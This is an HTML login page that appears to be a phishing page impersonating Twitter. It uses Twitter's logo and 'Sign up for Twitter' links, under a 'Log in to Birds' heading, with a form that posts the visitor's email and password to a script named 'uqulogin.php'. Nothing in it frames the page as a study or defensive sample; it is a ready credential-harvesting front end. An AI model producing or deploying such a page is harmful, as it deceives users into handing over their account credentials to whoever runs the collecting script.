
<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta charset="utf-8">
<title></title>
<style>
.center {
  margin: auto;
  width: 30%;
  border: 1px solid #fff;
  padding: 1px;
}
img {
  display: block;
 
  margin-right: auto;
}
a:link {

  text-align: center;


}

.button {
  width: 100%;
  display: inline-block;
  padding: 10px 80px;
  font-size: 24px;
  cursor: pointer;
  text-align: center;
  text-decoration: none;
  outline: none;
  color: #fff;
  background-color: #b3e6ff;
  border: none;
  border-radius: 30px;

}

.button:hover {background-color: #8bd7fd}

.button:active {
  background-color:#b3e6ff;
  box-shadow: 0 5px #666;
  transform: translateY(4px);
}
input {
  width: 100%;
  padding: 20px 25px;
  margin: 8px 0;
  box-sizing: border-box;
  border: 2px solid LightGray;
  border-radius: 4px;
}

</style>
</head>
<body >
<div class="center">
 <img  width="46" height="38" srcset="https://abs.twimg.com/errors/logo46x38.png 1x, https://abs.twimg.com/errors/logo46x38@2x.png 2x" src="https://abs.twimg.com/errors/logo46x38.png" alt="Twitter" />
      <h1 style="text-align:left;">Log in to Birds</h1>





<form action="uqulogin.php" method="post">


<label>Email</label><br>
<input type="Email" name="Email"><br>

<label>password</label><br>
<input type="password" name="password"><br><br>

<button class="button">Log in</button><br><br>


</form>
<a href="" style="width: 25%; color: DodgerBlue;">Forgot password?</a><a href="" style="width: 25%; color: DodgerBlue;">Sign up for Twitter</a>
</div>


   
</center>
</body>
</html>